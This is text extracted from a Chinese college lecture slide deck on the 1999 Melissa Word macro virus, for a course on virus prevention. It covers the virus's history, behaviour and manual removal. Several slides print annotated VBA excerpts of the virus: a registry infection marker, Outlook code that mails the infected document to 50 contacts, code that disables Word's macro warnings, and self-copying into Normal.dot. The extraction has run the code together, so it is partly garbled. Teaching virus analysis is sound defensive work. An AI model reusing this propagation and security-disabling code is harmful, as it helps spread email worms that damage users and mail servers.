《梅丽莎病毒剖析》PPT课件.ppt

计算机病毒与防治,重庆电子工程职业学院,计算机病毒与防治课程小组,教学单元3-3宏病毒防治,梅丽莎病毒源码分析,梅丽莎病毒特点,梅丽莎病毒行为分析,第二讲梅丽莎病毒剖析,计算机病毒与防治课程小组,梅丽莎病毒的手工清除,梅丽莎病毒特点,计算机病毒与防治课程小组,病毒名称：梅丽莎,又称Macro.Word97.Melissa,病毒类型：宏病毒,危险级别：,影响系统Word97/Word2000,梅丽莎病毒简介,梅丽莎病毒特点,计算机病毒与防治课程小组,“梅丽莎”病毒于1999年3月爆发，它伪装成一封来自朋友或同事的“重要信息”电子邮件。用户打开邮件后，病毒会让受感染的电脑向外发送50封携毒邮件。尽管这种病毒不会删除电脑系统文件，但它引发的大量电子邮件会阻塞电子邮件服务器，使之瘫痪。1999年4月1日，在美国在线的协助下，美国政府将史密斯捉拿归案。,梅丽莎病毒简介,梅丽莎病毒特点,计算机病毒与防治课程小组,2002年5月7日美国联邦法院判决这个病毒的制造者入狱20个月和附加处罚，这是美国第一次对重要的电脑病毒制造者进行严厉惩罚。在联邦法庭上，控辩双方均认定“梅丽莎”病毒造成的损失超过8000万美元，编制这个病毒的史密斯承认，他从AOL盗取了一个帐户名，并利用这个帐户到处传播宏病毒，最后他表示认罪，认为设计电脑病毒是一个“巨大的错误”，自己的行为“不道德”。,病毒制造者,梅丽莎病毒特点,计算机病毒与防治课程小组,该病毒通过电子邮件的方式传播,当用户打开附件中的“list.doc”文件时，将立刻中招。病毒的代码使用Word的VBA语言编写,开创了此类病毒的先河,如同病毒作者的猖狂之言“Itsanewage!”。病毒通过对注册表进行修改,并调用Outlook发送含有病毒的邮件,进行快速传播。由于该病毒发送的邮件的发件人是用户熟悉的,因此往往被很多人忽视。同时,该病毒会自动重复以上的动作,由此引起连锁反应,在短时间内,造成邮件服务器的大量阻塞,严重影响正常网络通讯。该病毒可感染Word97、Word2000的Doc文件,并修改通用模板Normal.dot,使受害者几乎永无“脱离苦海”之时。,梅丽莎病毒特点,梅丽莎病毒源码分析,计算机病毒与防治课程小组,梅丽莎病毒巧妙地利用了VBA技术对注册表、Word模板和邮件系统进行了猛烈地攻击。,1、梅丽莎病毒被激活后,将修改注册表中的“HKEY_CURRENT_USERSoftwareMicrosoftoffice”键,并增加项“Melissa？”,赋值为“byKwyjibo”(病毒作者的大名)，并将此作为是否已感染病毒的标志。病毒中相关操作的核心代码如下所示：读取注册表项的内容,进行判断IfSystem.PrivateProfileString(“”,“HKEY_CURRENT_USERSoftwareMicrosoftoffice”，“Melissa？”)“byKwyjibo”Then其它操作代码设置感染标志System.PrivateProfileString(“HKEY_CURRENT_USERSoftwareMicrosoftoffice”，“Melissa？”)=“byKwyjibo”EndIf,梅丽莎病毒源码分析,计算机病毒与防治课程小组,2、发送邮件在Outlook程序启动的情况下,梅丽莎病毒将自动给地址簿中的成员(前50名)发送邮件,主题为“ImportantMessageFrom”,用户名“”为Word软件的用户名,邮件的正文为“Hereisthatdocumentyouaskedfordontshowanyoneelse;一)”,邮件的附件为一个文件名为“list.doc”的带毒文件。为了实现七述功能,病毒利用获取了地址薄中所有的邮件地址,并发送内嵌病毒代码的邮件,达到了疯狂传播的目的。病毒中相关操作的核心代码如下所示：,梅丽莎病毒源码分析,计算机病毒与防治课程小组,DimUngaDasOutlook,DasMapiName,BreakUmoffASlice创建Outlook应用程序实例对象SetUngaDasOutlook=CreateObject(“Outlook.Application”)获取MAPI对象SetDasMapiName=UngaDasOutlook.GetNameSpace(“MAPI”)IfUngaDasOutlook=”Outlook”ThenDasMapiName.Logon“profile”,”password”遍历地址薄,进行邮件发送操作Fory=1ToDasMapiName.AddressLists.CountSetAddyBook=DasMapiName.AddressLists(y)X=1SetBreakUmoffASlice=UngaDasOutlook.CreateItem(0)Foroo=1ToAddyBook.AddressEntries.Count获取第n个收件人地址Peep=AddyBook.AddressEntries(x)加入收件人地址BreakUmoffASlice.Recipients.AddPeepX=x+1,梅丽莎病毒源码分析,计算机病毒与防治课程小组,Ifx50Thenoo=AddyBook.AddressEntries.CountNextoo设置邮件的主题BreakUmoffASlice.Subject=”ImportantMessageFrom”&Application.UserName设置邮件的正文BreakUmoffASlice.Body=”Hereisthatdocumentyouaskedfordontshowanyoneelse:-)”加入邮件的附件BreakUmoffASlice.Attachments.AddActiveDocument.FullName发送邮件BreakUmoffASlice.SendNexty断开连接DasMapiName.LogoffPeep=”EndIf,梅丽莎病毒源码分析,计算机病毒与防治课程小组,3、修改Word模版梅丽莎病毒激活后,将感染Word97和Word2000的文档并修改通用模板Normal.dot,使感染后的Word运行时“宏”菜单项不能使用,并且导致Word软件对文件转换、打开带有宏的文件、Normal.dot遭到修改后都不会出现警告,使病毒的魔爪“天衣无缝”。最后,将病毒自身的代码和所做的设置修改,利用一个很高超的方法一同写入Normal.dot之中,使用户以后打开Word时病毒反复发作。病毒中相关操作的核心代码如下所示：,梅丽莎病毒源码分析,计算机病毒与防治课程小组,使“宏”工具栏的“安全”项无效CommandBars(“Macro”).Controls(“Security”).Enabled=False使“工具”菜单栏的“宏”项无效CommandBars(“Tools”).Controls(“Macro”).Enabled=False将“0”(1-1)值赋于ConfirmConversions属性,使“文件转换”对话框不显示Options.ConfirmConversions=(1-1)将,“0”（1-1）值赋于VirusProtection属性,使“宏警告”对话框不显示Options.VirusProtection=(1-1)将“0”(1-1)值赋于SaveNormalPrompt属性,使Normal.dot被修改后不显示警告对话框Options.SaveNormalPrompt=(1-1)获取当前文档的VBA工程的第1个模块名称SetADI1=ActiveDocument.VBProject.VBComponents.Item(1)获取Normal.dot的VBA工程的第1个模块名称SetNTI1=NormalTemplate.VBProject.VBComponents.Item(1)NTCL=NTI1.CodeModule.CountOfLinesADCL=ADI1.CodeModule.CountOfLinesBGN=2,梅丽莎病毒源码分析,计算机病毒与防治课程小组,如果当前文档未感染IfADI1.Name”Melissa”Then修改VBA工程的第1个模块名称为“Melissa”IfADCL0ThenADI1.CodeModule.DeleteLines1,ADCLSetToInfect=ADI1ADI1.Name=“Melissa“DoAD=TrueEndIf如果Normal.dot未感染IfNTI1.Name“Melissa”Then修改VBA工程的第1个模块名称为“Melissa“IfNTCL0ThenNTI1.CodeModule.DeleteLines1,NTCLSetToInfect=NTI1NTI1.Name=”Melissa”DoNT=TrueEndIf,梅丽莎病毒源码分析,计算机病毒与防治课程小组,如果都已感染,跳转执行以后的命令IfDoNTTrueAndDoADTrueThenGoToCY开始感染Normal.dotIfDoNT=TrueThenDoWhileADI1.CodeModule.Lines(1,1)=”ADI1.CodeModule.DeleteLines1LoopToInfect.CodeModule.AddFromString(“PrivateSubDocument_Close（）”)DoWhileADI1.CodeModule.Lines(BGN,1)“”ToInfect.CodeModule.InsertLinesBGN,ADI1.CodeModule.Lines(BGN,1)BGN=BGN+1LoopEndIf,梅丽莎病毒源码分析,计算机病毒与防治课程小组,IfDoAD=TrueThen开始感染当前文档DoWhileNTI1.CodeModule.Lines(1,1)=”NTI1.CodeModule.DeleteLines1LoopToInfect.CodeModule.AddFromString(“PrivateSubDocument.Open()”)DoWhileNTI1.CodeModule.Lines(BGN,1)”ToInfect.CodeModule.InsertLinesBGN,NTI1.CodeModule.Lines(BGN,1)BGN=BGN+1LoopEndIfCYA:保存被修改的当前文档和Normal.dotIfNTCL0AndADCL=0And(InStr(1,ActiveDocument.Name,”Document”)=False)ThenActiveDocument.SaveAsFileName=ActiveDocument.FullNameElseIf(InStr(1,ActiveDocument.Name,”Document”)False)ThenActiveDocument.Saved=TrueEndIfEnfIf,梅丽莎病毒主要行为分析,计算机病毒与防治课程小组,梅丽莎病毒源码,梅丽莎病毒对注册表的修改,梅丽莎病毒发出的邮件,梅丽莎病毒手工清除,计算机病毒与防治课程小组,感染了梅丽莎病毒后，同样可以用最新的防治计算机病毒的软件来查杀，如果手头上一时没有病毒防治软件的话，对感染宏病毒的WORD文件也可以通过手工操作的方法来处理。,（1）在Administrator用户下，打开我的电脑,选择“工具文件夹选项查看”,选中“显示系统文件夹的内容”和“显示所有文件和文件夹”选项,取消“隐藏受保护的操作系统文件”选项,确定后搜索NORMAL.DOT文件。注意在搜索时要将“更多高级选项”下的“搜索系统文件夹”和“搜索隐藏的文件和文件夹”都勾上,待搜索完毕后,将找到的NORMAL.DOT文件全部删除,并清空回收站.,（2）打开注册表编辑器，搜索所有键名称为“Melissa”的项，全部删除。,熊猫烧香病毒手工清除,计算机病毒与防治课程小组,（3）删除所有染毒WORD文件，如果需要保留某个文件中的内容，选中该文件,单击鼠标右键选择“打开方式”,在程序选择框选择“写字板”打开文件,然后另存为DOC文件。或者在高版本的WORD软件中打开文件清除里面的宏处理。,（4）最后新建一个Word空文档并打开,倘若没有报错而且Word中各功能项可用,则Word可以正常使用了。,本讲小结,梅丽莎病毒特点,梅丽莎病毒源码分析,梅丽莎主要行为分析,具有典型宏病毒行为分析能力反病毒能力,计算机病毒与防治课程小组,梅丽莎病毒手工清除,ThankYou!,